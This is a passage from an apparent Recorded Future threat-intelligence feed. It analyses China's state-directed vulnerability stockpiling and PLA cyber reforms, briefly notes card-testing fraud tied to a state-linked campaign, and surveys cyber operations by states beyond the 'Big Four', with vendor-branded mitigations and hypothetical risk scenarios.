        <p>China’s private sector also plays a <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/crash-exploit-and-burn/#conclusion">pivotal role</a>. Major firms such as Qi An Xin, Huawei, Qihoo 360, and NSFocus contribute vulnerabilities and technical expertise directly to the government. Large technology companies also fund or subcontract offensive work to smaller firms, creating a dense ecosystem of start-ups engaged in exploit research and hacking services. The <a href="https://www.recordedfuture.com/research/attributing-i-soon-private-contractor-linked-chinese-state-sponsored-groups">i-SOON leaks</a> (2023) revealed the scale and interconnectedness of this ecosystem: The company sold hack-for-hire services and targeting platforms to government customers while subcontracting work for Qi An Xin and Chengdu 404.</p>
        <h3>From Discovery to Deployment: Operationalizing China’s Vulnerability Pipeline</h3>
        <p>This centralized vulnerability ecosystem is producing <a href="https://nattothoughts.substack.com/p/chinas-vulnerability-research-whats">measurable results</a>, enabling Chinese state-sponsored groups to convert vulnerability discovery into operational access at a speed and scale far beyond that seen in other national programs. A clear manifestation of this is their sustained focus on enterprise and edge technologies, including Fortinet, VMware/ESXi, and Ivanti, where access is durable and often high-privileged, and detection is limited. In 2025, China-linked groups exploited <a href="https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day">Ivanti VPN</a> and Trimble Cityworks (<a href="https://www.recordedfuture.com/blog/trimble-cityworks-cve-2025-0994-vulnerability-analysis">1</a>, <a href="https://therecord.media/hackers-exploiting-trimble-cityworks-bug-used-by-local-govs">2</a>) flaws as part of a long-term strategy to remain undetected within networks, expand access, and position themselves for potential critical infrastructure disruption.</p>
        <p>China continues to expand its network of CNNVD technical support units (TSUs) and related programs, increasing its overall research base. TSUs are specialized organizations, often universities, state-linked labs, and cybersecurity firms that directly feed vulnerability research and intelligence into the national system. Since 2021, the number of TSUs has increased significantly, broadening the state’s research capacity and deepening its ability to identify and operationalize software flaws at scale.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_13e7963e118803f4d4991324bfaa7fc0ddd6019fc.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="900" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Number of new CNNVD TSUs by month, June 2021 to July 2025</em> <em>(Source:</em> <em><a href="https://nattothoughts.substack.com/p/chinas-vulnerability-research-whats">Natto Thoughts</a>)</em></div>
          </div>
        </div>
        <p>Most vulnerability disclosures to affected vendors and the broader security community still originate from universities, labs, and cybersecurity firms associated with CNNVD, CNVD, and the expanding TSU network. However, even as the ecosystem grows, the overall volume of these disclosures continues to <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/sleight-of-hand-how-china-weaponizes-software-vulnerability/">decline</a>, indicating that a larger share of discoveries is now being routed <a href="https://www.recordedfuture.com/blog/chinese-mss-vulnerability-influence">internally</a> rather than published. This suggests that more vulnerabilities are being withheld for state-directed use. Secrecy surrounding hacking competitions is also growing: The Tianfu Cup was not held publicly in 2024, and the 2024 Matrix Cup shared little to <a href="https://nattothoughts.substack.com/p/the-matrix-cup-cultivating-top-hacking">no details</a> about discovered exploits. These competitions have historically been major sources of high-quality vulnerabilities, and reduced transparency further aligns with the shift away from open disclosure.</p>
        <p>Together, these trends — the rapid expansion of TSUs, the decline in public vulnerability reporting, and the tightening secrecy around exploit-generation events — likely point to a deliberate state strategy that emphasizes centralized stockpiling and selective operational use of vulnerabilities rather than public disclosure.</p>
        <p><strong>Strategic Stockpiling and Selective Use</strong></p>
        <p>China’s <a href="https://cloud.google.com/blog/topics/threat-intelligence/2023-zero-day-trends">reported</a> use of zero-days declined from twelve in 2023 to five in 2024, and it is responsible for only ten of the 104 zero-day exploits identified globally so far in 2025. While this may partly reflect limited visibility into zero-day deployment and attribution, the trend may also suggest a more selective, strategic approach to when and how its zero-day capabilities are used.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_13d3e1d5ebec066cdcdff5beca720487d65e8ef26.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="816" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 3:</strong></em> <em>Of the 104 zero-days identified in 2025, ten were attributed to Chinese state-sponsored threat actors (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>Beijing’s control mechanisms under the RMSV and DSL enable it to selectively weaponize or withhold zero-days, preserving its most impactful capabilities for crises or strategic objectives. At the same time, n-day vulnerabilities — older but still unpatched flaws — remain highly effective due to inconsistent global patching.</p>
        <p>Using these known flaws allows Chinese operators to gain access to networks and gather intelligence without revealing their zero-day exploits. Overall, this reflects a system designed for long-term preparedness rather than immediate gain.</p>
        <p><strong>Military Integration and Strategic Significance</strong></p>
        <p>China’s April 2024 military reforms <a href="https://ndupress.ndu.edu/Media/News/News-Article-View/Article/4157257/a-new-step-in-chinas-military-reform/">introduced</a> three new divisions within the People’s Liberation Army (PLA), including two centered on cyber and information security:</p>
        <ul>
          <li>The Information Support Force (ISF), which is <a href="https://jamestown.org/program/a-disturbance-in-the-force-the-reorganization-of-peoples-liberation-army-command-and-elimination-of-chinas-strategic-support-force/">responsible</a> for the security and continuity of China’s military networks, data systems, and command infrastructure</li>
          <li>The Cyberspace Force (CSF), which is <a href="https://www.iiss.org/online-analysis/online-analysis/2024/05/chinas-new-information-support-force/">dedicated</a> to both offensive and defensive cyber operations</li>
        </ul>
        <p>Together, the two units consolidate China’s cyber and information capabilities, which were previously nested primarily under the PLA Strategic Support Force. These units form the backbone of its digital warfighting structure. The restructuring is likely to enhance Beijing’s ability to coordinate kinetic and cyber operations, with zero-days serving as key enablers and potential first-strike tools.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1e37fc1772617d06c2746e0f6deba2a514f7ffd2b.png?width=750&amp;format=png&amp;optimize=medium" width="1249" height="512" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>New structure of the People’s Liberation Army (PLA) (Source:</em> <em><a href="https://jamestown.org/wp-content/uploads/2024/04/CB-V-24-Issue-9-April-26.pdf">The Jamestown Foundation</a>)</em></div>
          </div>
        </div>
        <p>The future use of zero-days will depend on how China decides to pursue its geostrategic goals, such as <a href="https://www.recordedfuture.com/research/from-coercion-to-invasion-the-theory-and-execution-of-china-cyber-activity">future unification</a> with Taiwan. However, by compromising critical networks in advance, China can secure persistent access and deploy disruptive cyber effects alongside kinetic operations, as seen in Russia’s <a href="https://blogs.microsoft.com/on-the-issues/2022/06/22/defending-ukraine-early-lessons-from-the-cyber-war/">coordinated</a> cyber-military campaigns in Ukraine. Chinese state-sponsored <a href="https://app.recordedfuture.com/portal/intelligence-card/rWxgd_/overview">Volt Typhoon</a> activity has been widely assessed as fulfilling such a purpose.</p>
        <h2>Outlook</h2>
        <ul>
          <li><strong>Increased Willingness to Use Zero-Days:</strong> As China reduces its reliance on US technology through its “<a href="https://www.wsj.com/world/china/china-technology-software-delete-america-2b8ea89f?gaa_at=eafs&amp;gaa_n=AWEtsqePdzH3SRky1gFGa5OK6eLRoL78W2-ChzKYqbYaN8iUdsXKWF60d69fkSz8XTs%3D&amp;gaa_ts=68f7a71d&amp;gaa_sig=afo7Dvij1rhGpclsWz_RcXPU0MRK8PaKKNGOTG0Hj8LOLI9vBlFGl8iwGOQq2yx1FCUqK89rZf_PDBlddaDQvg%3D%3D">Delete America</a>” campaign, the cost of exploiting Western software will decrease, making zero-day use more attractive in future conflicts over the long term.</li>
          <li><strong>Expanded Pre-Positioning:</strong> Expect continued infiltration of critical infrastructure and enterprise systems through both n-day and zero-day exploits to ensure durable wartime access.</li>
          <li><strong>Increased N-day Use:</strong> The rapid adoption of AI-assisted coding and automation is accelerating the accumulation of software vulnerabilities. This expanding security debt — the accumulation of unpatched and unreviewed vulnerabilities — will give adversaries, including China, a broader and more persistent pool of n-day exploits to weaponize.</li>
          <li><strong>Evolving Contractor Ecosystem:</strong> State-aligned private firms are likely to accelerate automation and AI-assisted vulnerability discovery, thereby expanding the Chinese state’s operational stockpile of viable exploits.</li>
        </ul>
        <h2>Mitigations</h2>
        <ul>
          <li><strong>Adopt an “Assume Breach” Posture:</strong> Implement zero-trust architectures that enforce identity and device verification at every access point. Use <a href="http://recordedfuture.com/products/threat-intelligence">Recorded Future® Threat Intelligence</a> to monitor for China-nexus infrastructure and malicious activity, feeding enriched indicators directly into security information and event management (SIEM) and security orchestration, automation, and response (SOAR) workflows.</li>
          <li><strong>Prioritize Edge and Enterprise Patching:</strong> Focus remediation efforts on virtual private networks (VPNs), firewalls, hypervisors, and identity platforms most commonly targeted by China-nexus threat actors. Use <a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Recorded Future Vulnerability Intelligence</a> to track emerging zero-day and n-day threats, prioritize patching by exploitation risk, and validate remediation across critical systems.</li>
          <li><strong>Detect Post-Exploitation Behavior:</strong> Use D3FEND mappings such as Process Access Pattern Analysis (D3-PAPA) and Remote Access Detection (D3-RAD) to identify stealthy follow-on actions. Combine these controls with <a href="https://www.recordedfuture.com/products/attack-surface-intelligence">Recorded Future Attack Surface Intelligence</a> to identify exposed assets and verify that detection coverage extends to externally facing environments.</li>
          <li><strong>Secure Identities and Access:</strong> Leverage <a href="https://www.recordedfuture.com/products/identity-intelligence">Recorded Future Identity Intelligence</a> to detect compromised credentials that may complement exploit-based intrusions.</li>
        </ul>
        <h2>Risk Scenario</h2>
        <p><em>EnerTech Global</em>, a European energy technology firm providing control systems and smart grid software to multiple NATO-aligned countries, becomes the target of a Chinese state-sponsored cyber campaign. Using undisclosed zero-day vulnerabilities, Chinese operators infiltrate EnerTech’s production and customer environments to gather intelligence, manipulate software updates, and pre-position for potential disruption.</p>
        <h3>First-Order Implications</h3>
        <p>Chinese threat actors exploit a zero-day in a network management or VPN appliance to gain initial access to EnerTech’s internal systems and engineering networks.</p>
        <p>A zero-day in industrial control or software build pipelines is used to insert malicious code into firmware updates distributed to downstream customers.</p>
        <h4>Organizational Risks:</h4>
        <ul>
          <li><strong>Operational:</strong> Compromise of development and production networks halts manufacturing and disrupts customer support operations.</li>
          <li><strong>Legal:</strong> Breach of export-control and cybersecurity regulations triggers EU and US compliance investigations.</li>
          <li><strong>Brand:</strong> Public confirmation of a “state-backed breach” undermines trust with government and defense customers dependent on EnerTech’s technology.</li>
        </ul>
        <h3>Second-Order Implications</h3>
        <p>Attackers use stolen code-signing certificates to distribute trojanized software updates to energy utilities across Europe. Collected intelligence on grid infrastructure is used to map potential disruption points for future contingency operations.</p>
        <h4>Organizational Risks:</h4>
        <ul>
          <li><strong>Operational:</strong> Some utilities begin to see irregularities in their operational technology (OT) environments, including unexpected behavior in grid-monitoring tools, delayed telemetry updates, and unexplained authentication failures on systems that rely on EnerTech software.</li>
          <li><strong>Brand:</strong> EnerTech’s reputation deteriorates as customers and regulators question its software assurance and supply chain controls.</li>
          <li><strong>Legal:</strong> Disclosure of tampered software triggers international incident response coordination and potential export-license suspension.</li>
        </ul>
        <h3>Third-Order Implications</h3>
        <p>Persistent access enables China to remotely sabotage or disable systems during a geopolitical crisis, thereby amplifying disruption across allied power grids. Stolen intellectual property is used by Chinese competitors to replicate EnerTech’s industrial software, undercutting global market bids.</p>
        <h4>Organizational Risks:</h4>
        <ul>
          <li><strong>Competitive:</strong> Loss of proprietary code and technology enables China-based competitors to dominate regional procurement markets.</li>
          <li><strong>Brand:</strong> Association with a high-profile critical infrastructure breach erodes long-term credibility in both commercial and government sectors.</li>
          <li><strong>Legal:</strong> Multinational investigations and sanctions create enduring compliance exposure and financial penalties.</li>
        </ul>
        <h2>Further Reading</h2>
        <ul>
          <li><a href="https://www.recordedfuture.com/research/redecho-targeting-indian-power-sector">China-linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions</a></li>
          <li><a href="https://www.recordedfuture.com/research/continued-targeting-of-indian-power-grid-assets">Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group</a></li>
          <li><a href="https://www.recordedfuture.com/research/from-coercion-to-invasion-the-theory-and-execution-of-china-cyber-activity">From Coercion to Invasion: The Theory and Execution of China’s Cyber Activity in Cross-Strait Relations</a></li>
          <li><a href="https://www.recordedfuture.com/blog/chinese-mss-vulnerability-influence">China’s Ministry of State Security Likely Influences National Network Vulnerability Publications</a></li>
          <li><a href="https://www.iiss.org/online-analysis/online-analysis/2024/05/chinas-new-information-support-force/">China’s new Information Support Force</a></li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_103d01df10dae3a07a40c46523f00a6b54d5aa865.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The $0 Transaction That Signaled a Nation-State Cyberattack]]></title>
            <link>https://www.recordedfuture.com/blog/transaction-that-signaled-nation-state-cyberattack</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/transaction-that-signaled-nation-state-cyberattack</guid>
            <pubDate>Wed, 17 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[A $0 card test signaled a Chinese state-linked cyberattack on Anthropic’s AI platform. Learn how card-testing fraud intelligence spots nation-state ops early.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Key Points:</h2>
              <ul>
                <li>Fraud enables cyber operations: Threat actors used compromised payment cards validated through Chinese-operated card-testing services to attempt unauthorized access to Anthropic's AI platform during a reported state-sponsored espionage campaign.</li>
                <li><a href="https://www.recordedfuture.com/products/payment-fraud-intelligence">Card testing</a> signals downstream attacks: The observed fraud followed a predictable kill chain—compromise, validation, resale, and attempted cashout—providing early warning <a href="https://www.recordedfuture.com/threat-intelligence-101/intelligence-sources-collection/threat-intelligence-feeds">indicators</a> that preceded the final malicious transaction.</li>
                <li>Recorded Future’s take: Proactive fraud intelligence prevents broader threats. Tester merchant intelligence can identify compromised cards before they're used for high-value fraud or to support advanced threat actor operations.</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1b69b3987107eb35b9673377e1cac520995d23f77.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Cyber on the Geopolitical Battlefield: Beyond the “Big Four”]]></title>
            <link>https://www.recordedfuture.com/research/cyber-geopolitical-battlefield</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/cyber-geopolitical-battlefield</guid>
            <pubDate>Wed, 17 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Offensive cyber operations are spreading beyond the Big Four. Discover how regional conflicts are driving new state-linked cyber threats.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Regional conflicts and weakened international institutions are driving the use of offensive cyber operations beyond the “Big Four” (China, Russia, Iran, and North Korea). Monitoring these threat actors requires organizations to <strong>proactively assess their geopolitical risk</strong> to understand where future threats are most likely to emerge.</p>
        <p>In 2025, Recorded Future identified at least <strong>twenty actors across thirteen “non-Big Four” countries</strong> conducting cyber operations, primarily linked to regional conflicts, domestic surveillance, or foreign espionage.</p>
        <p>Companies should closely monitor regional geopolitics and <strong>maintain strong continuity and resilience plans</strong> to protect against cyber espionage or disruptive cyberattacks.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_18967900e841d62eae716d18a4b04dcc4ae65efcb.png?width=750&amp;format=png&amp;optimize=medium" width="1194" height="668" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>Trends influencing how and why state-sponsored actors beyond China, Russia, Iran, and North Korea carry out cyber operations (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Analysis</h2>
        <h3><em>Overview of Other State Sponsors of Cyber Operations</em></h3>
        <p>While the “Big Four” account for the majority of reported cyber threat activity, many other countries use cyber operations to advance their strategic interests. Recorded Future data shows that most observed activity outside of the “Big Four” stems from regional conflicts. Patriotic hacktivist groups, which advance state interests alongside state-sponsored espionage operations, represent the highest volume of reported activity. The degree of coordination between hacktivists and the government remains unclear and likely <a href="https://www.atlanticcouncil.org/wp-content/uploads/2012/02/022212_ACUS_NatlResponsibilityCyber.PDF">varies</a>. However, their actions are included in this assessment because of their close alignment with state objectives, which means their activity correlates with interstate conflict risk.</p>
        <p>Outside of active conflict, espionage against foreign and domestic targets continues to be a major driver of cyber operations. The most <a href="https://www.iiss.org/globalassets/media-library---content--migration/files/research-papers/cyber-power-report/cyber-capabilities-and-national-power---a-net-assessment___.pdf">cyber-capable</a> states invest heavily in avoiding detection and attribution, given the significant <a href="https://europe.unc.edu/wp-content/uploads/sites/314/2016/11/Brief_NSA_Leaks_Transatlantic_Relations_2014.pdf">negative</a> political consequences of exposure.</p>
        <p>Tracking threat actors beyond the Big Four requires organizations to understand their geopolitical risk in order to anticipate where threats are most likely to emerge. Operating in certain regions or conflict zones likely increases the risk of cyber espionage or destructive attacks.</p>
        <h3><em>Regional Cyber Conflicts</em></h3>
        <p>Territorial disputes drove nearly two-thirds of observed cyber activity in 2025, according to Recorded Future data. Cyber operations focused on intelligence collection against government, defense, and other critical infrastructure. Hacktivists escalated their activity during conflicts, carrying out nuisance-level attacks amplified through influence operations. Like hacktivists, influence operations align closely with state interests during conflict, but have varying degrees of connection to the state. These activities rarely affect battlefield outcomes but are designed to signal technical sophistication or moral superiority over the adversary.</p>
        <h4>India and Pakistan</h4>
        <p>Between May 7 and 10, 2025, India and Pakistan <a href="https://www.stimson.org/2025/four-days-in-may-the-india-pakistan-crisis-of-2025/">exchanged</a> a series of missile strikes — the most serious escalation between the two nuclear-armed countries in decades. Throughout the crisis, large volunteer hacktivist communities on both sides conducted disruptive attacks, <a href="https://www.rusi.org/explore-our-research/publications/commentary/operation-sindoor-and-india-pakistans-escalated-rivalry-cyberspace">primarily</a> DDoS and website defacements. Pakistan-linked APT36 <a href="https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/">conducted</a> espionage operations <a href="https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html">targeting</a> the Indian government and other politically motivated targets, while threat actors linked to the Indian government, such as SideWinder, pursued Pakistani <a href="https://www.acronis.com/en/tru/posts/from-banks-to-battalions-sidewinders-attacks-on-south-asias-public-sector/">military</a> targets.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a9881b0bdbc5c31c2a924c1974d48e4684a87fe0.png?width=750&amp;format=png&amp;optimize=medium" width="1140" height="628" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Cyber activity between India and Pakistan spiked alongside the outbreak of armed conflict in May 2025 (Source:</em> <em><a href="https://www.recordedfuture.com/research/influence-operations-and-conflict-escalation-in-south-asia">Recorded Future</a>)</em></div>
          </div>
        </div>
        <p>Influence operations intended to shape perceptions of the conflict also <a href="https://www.recordedfuture.com/research/influence-operations-and-conflict-escalation-in-south-asia">intensified</a>. Influence networks amplified hacktivist claims, often overstating their impact, such as <a href="https://www.hindustantimes.com/trending/pib-debunks-claim-that-pakistani-hackers-crippled-70-of-india-s-power-grid-101747134385434.html">widespread reporting</a> on Pakistani social media that hackers had shut down 70% of India’s electric grid. These operations are intended to portray their own side as more capable and their adversary as vulnerable, underscoring the importance of narrative control in conjunction with military operations.</p>
        <h4>Thailand and Cambodia</h4>
        <p>Similar to cyber engagements observed between India and Pakistan, hacktivist operations bolstered by influence campaigns <a href="https://moderndiplomacy.eu/2025/07/21/cyber-clashes-between-cambodia-and-thailand-threaten-asean-stability/">significantly escalated</a> between Thai hackers and Cambodian hackers following the <a href="https://www.politico.com/news/2025/07/23/thai-and-cambodian-soldiers-fire-at-each-other-in-disputed-border-area-00473426">May 2025</a> conflict. These were largely carried out by self-proclaimed patriotic hacktivist groups. Operations included DDoS attacks, website defacements, and data leak operations. More targeted <a href="https://www.cnn.com/2025/07/01/asia/thailand-pm-paetongtarn-suspended-intl-hnk">hack-</a><a href="https://www.bangkokpost.com/thailand/general/3083900/cyber-cops-send-leaked-hun-sen-audio-file-to-oag">and-leak</a> operations were also intended to reveal politically damaging information about the other country’s leadership. Influence operation narratives emphasized that the opposing side was the aggressor in the conflict, likely in order to garner both domestic and international support.</p>
        <h4>Morocco and Algeria</h4>
        <p>While <a href="https://www.cyfirma.com/research/explainer-the-algeria-morocco-tensions/">tensions</a> between Morocco and Algeria have not escalated into armed conflict, cyber hostilities increased significantly in 2025. In the context of these tensions, pro-Algerian hacktivists have allegedly carried out a series of high-profile attacks on Moroccan institutions, <a href="https://therecord.media/morocco-investigates-breach-hackers-algeria">striking</a> the National Social Security Fund, the <a href="https://cybelangel.com/blog/ancfcc-data-leak-flash-report/">National Agency for Land Conservation</a>, and the <a href="https://www.moroccoworldnews.com/2025/06/210448/algerias-jabaroot-targets-justice-ministry-in-latest-cyberattack-on-moroccan-institutions/">Ministry of Justice</a>. The hackers, going by JabaROOT, leaked personal and financial data of millions of Moroccan citizens, potentially exacerbating existing domestic tensions over income disparity. The cyberattacks may have been intended to demonstrate Moroccan vulnerability while maintaining a level of deniability for the Algerian government. Moroccan hacktivists responded with <a href="https://izoologic.com/region/africa/morocco-data-breach-sparks-wave-of-cyber-retaliations/">retaliatory data breaches</a> against the Algerian government and education institutions.</p>
        <h3><em>Espionage Operations Outside of Armed Conflict</em></h3>
        <p>While many more countries almost certainly engage in cyber espionage, the following threat actors have been tracked attempting to collect information on targets of political significance:</p>
        <ul>
          <li>While <strong>India-linked</strong> threat actors such as <a href="https://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/">SideWinder</a> and <a href="https://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one">Bitter</a> have traditionally targeted neighbors like Pakistan, Sri Lanka, and Bangladesh, espionage against European diplomatic entities <a href="https://www.enisa.europa.eu/sites/default/files/2025-10/ENISA%20Threat%20Landscape%202025.pdf">increased</a> significantly in 2024, demonstrating a broader targeting scope.</li>
          <li><strong>Vietnam</strong> has <a href="https://www.aspeninstitute.org/publications/the-rise-of-the-rest-maturing-cyber-threats-beyond-the-big-four/">accelerated</a> its development of cyber capabilities. APT32, likely linked to the Vietnamese government, has carried out <a href="https://gbhackers.com/apt32-hacker-group-poisoning-github/">operations</a> against Chinese cybersecurity researchers as well as against internal <a href="https://thehackernews.com/2024/08/vietnamese-human-rights-group-targeted.html">dissidents</a>. In the past, this group has also targeted <a href="https://cyberscoop.com/apt32-ocean-lotus-vietnam-car-companies-hacked/">car manufacturers</a>, <a href="https://www.recordedfuture.com/research/apt32-malware-campaign">foreign governments</a>, and others, driven by geopolitical and economic priorities.</li>
          <li>At least two threat actor groups observed conducting espionage operations have been linked to <strong>Türkiye</strong>: <a href="https://www.microsoft.com/en-us/security/blog/2025/05/12/marbled-dust-leverages-zero-day-in-output-messenger-for-regional-espionage/">Marbled Dust</a> and <a href="https://cyberscoop.com/strongpity-apt-alien-labs-turkey/">StrongPity</a>, who prioritize regional and domestic targets. In addition, a <a href="https://assets.recordedfuture.com/insikt-report-pdfs/2023/cta-2023-0112.pdf">robust online community</a> of patriotic hacktivists targets regional and international adversaries, whether historical (such as Armenia and Greece) or in modern disputes (France and Germany).</li>
          <li>Stealth Falcon, <a href="https://attack.mitre.org/groups/G0038/">linked</a> to the <strong>United Arab Emirates</strong>, has been <a href="https://blog.checkpoint.com/research/inside-stealth-falcons-espionage-campaign-using-a-microsoft-zero-day/">observed</a> exploiting a zero-day vulnerability to target a Turkish defense organization. The group has been active since at least 2016, targeting government and defense organizations primarily in the Middle East and Africa.</li>
        </ul>
        <p>Political and diplomatic priorities make intelligence targets predictable. Organizations should assess not only their regional exposure but also whether their industry aligns with strategic priorities, as sectors tied to national strategy are the most likely targets for espionage.</p>
        <h3><em>Domestic Surveillance Activity</em></h3>
        <p>Many states use their cyber capabilities to monitor domestic security concerns, which can include law enforcement or national security priorities, monitoring political opposition, or conducting economic espionage on behalf of a key national industry. Domestic surveillance capabilities are often supplemented with commercial off-the-shelf spyware, such as Intellexa’s <a href="https://www.recordedfuture.com/research/intellexas-global-corporate-web">Predator</a> or Candiru’s <a href="https://www.recordedfuture.com/research/tracking-candirus-devilstongue-spyware">DevilsTongue</a>. Similar to understanding political priorities for cross-border espionage, companies should assess whether they possess data that may be of political significance to the government of a country in which they operate. States that lack sufficient oversight or legal privacy protections <a href="https://substack.com/inbox/post/180401534?r=3g10gt&amp;utm_medium=ios&amp;triedRedirect=true">pose an increased risk</a> of intrusive cyber monitoring and surveillance.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1266d09a14347a2b84e82e385594f3abfe78022ec.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="835" />
            </div>
          </div>
          <div>
            <div>
              <p><em><strong>Figure 3:</strong></em> <em>(Left) Graphical representation from the Insikt Group report titled Dark Covenant of the direct and indirect links between Russian Intelligence Services and individuals in the Russian cybercriminal underground; (Right) Infographic of reported cyberattack by Russian state-backed ransomware operators against German military contractors</em></p>
              <p><em>(Source: Recorded Future)</em></p>
            </div>
          </div>
        </div>
        <h2>Outlook</h2>
        <ul>
          <li><strong>Cyberattacks are likely to increase as international alliances weaken</strong>: The Thailand-Cambodia and India-Pakistan conflicts demonstrate an increased willingness to use force to pursue regional goals. Deployments in multilateral peacekeeping operations <a href="https://www.sipri.org/media/press-release/2025/peace-operation-deployments-fall-40-per-cent">decreased by 40%</a> over the last decade, likely due to challenges in generating the necessary support for intervention. This makes it more likely that states will turn to violence to resolve disputes, as opposed to non-violent negotiations. Cyber and influence operations are becoming increasingly common features in these conflicts, serving as a low-cost means of signaling strength, shaping narratives, and imposing limited disruption.</li>
          <li><strong>Cyber capability build-up may follow conventional military build-up:</strong> NATO countries in <a href="https://www.voanews.com/a/billion-rearmament-plan-fuels-european-defense-stocks/8002455.html">Europe</a>, as well as South Korea and <a href="https://apnews.com/article/japan-military-budget-us-australia-china-f82c70bd6f5cbfc184f15cf17f2fde21">Japan</a>, are increasing their military spending. While many of these countries already have advanced cyber capabilities, they may seek to invest in more sophisticated offensive capabilities to augment conventional forces. Legal and doctrinal changes, such as in <a href="https://therecord.media/japan-enacts-new-law-allowing-offensive-cyber-operations">Japan</a> and <a href="https://www.csis.org/blogs/strategic-technologies-blog/south-koreas-2024-cyber-strategy-primer">South Korea</a>, are also laying the groundwork for a shift from a defensive cyber policy to an offensive posture.</li>
          <li><strong>Commercial cyber capabilities may be sought for interstate conflict:</strong> Countries seeking to gain a cyber advantage in advance of a regional conflict may turn to commercial offensive tools, similar to the <a href="https://therecord.media/spyware-purchased-by-eighty-countries-gchq-warns">growing reliance</a> on these tools for internal law enforcement or counterterrorism operations. This reduces the barrier to entry for smaller or less technically mature states, enabling more actors to conduct sophisticated intrusions, targeted espionage, and high-impact disruption.</li>
        </ul>
        <h2>Mitigations</h2>
        <ul>
          <li>Use Recorded Future’s <a href="https://www.recordedfuture.com/products/geopolitical-intelligence">Geopolitical Intelligence</a> to monitor regional conflicts and geopolitical developments for risks to international and outsourced operations.</li>
          <li>Use Recorded Future’s <a href="https://www.recordedfuture.com/products/threat-intelligence">Threat Intelligence</a> to track threat actor groups and detect TTPs associated with non-Big Four countries.</li>
          <li>Understand the risk of surveillance for personnel traveling to high-risk countries and take mitigating actions such as using alternative devices. Use Recorded Future’s Country Risk Data in the <a href="https://www.recordedfuture.com/products/geopolitical-intelligence">Geopolitical Intelligence</a> module to assess surveillance and other travel risks.</li>
          <li>Ensure continuity-of-operations plans are in place to mitigate the impacts of disruptive or destructive attacks. Use Recorded Future <a href="https://www.recordedfuture.com/services/analyst-on-demand">Analyst-on-Demand</a> for bespoke research on how your organization might be targeted.</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1cdc94730e147e8664f08d34340f7be84e08d6510.png?width=750&amp;format=png&amp;optimize=medium" width="1304" height="724" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>Starting with these four questions can help you understand threat actors’ motivations for targeting your organization (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Risk Scenario</h2>
        <p><em>A longstanding territorial dispute between Country A and Country B erupts into a military skirmish at the border, with risks of further escalation. Country A is home to a robust business process outsourcing industry serving some of the world’s largest international corporations.</em></p>
        <h3>First-Order Implications</h3>
        <p>Groups claiming to be patriotic hacktivists from both countries conduct hack-and-leak operations and website defacements. These are amplified by partisans on social media who often exaggerate the impact of these attacks.</p>
        <ul>
          <li><strong>Competitive disadvantage:</strong> Hack-and-leak operations expose sensitive internal documents, including proprietary trade secrets and embarrassing communications.</li>
          <li><strong>Increased surveillance risk:</strong> The conflict increases domestic surveillance activity in Country B to monitor for internal threats. International employees traveling to Country B are subject to enhanced surveillance.</li>
        </ul>
        <h3>Second-Order Implications</h3>
        <p>Actors claiming to be hacktivists supporting Country A escalate cyber operations, carrying out persistent cyberattacks against Country B’s electrical grid. As a result, Country B experiences rolling blackouts in the capital city.</p>
        <ul>
          <li><strong>Operational disruption:</strong> The blackouts prevent call centers from performing essential business functions, resulting in significant service delays and revenue losses for corporations worldwide.</li>
          <li><strong>Physical security risk:</strong> Anger over blackouts increases public support for escalating operations against Country A. The escalation of conflict increases the risk of harm to employees or the destruction of facilities.</li>
        </ul>
        <h3>Third-Order Implications</h3>
        <p>The United States and China become increasingly involved in the conflict between Country A and Country B, providing military, logistical, and cyber capabilities to their preferred country. The external support prolongs the conflict and increases the risk of involving neighboring countries.</p>
        <ul>
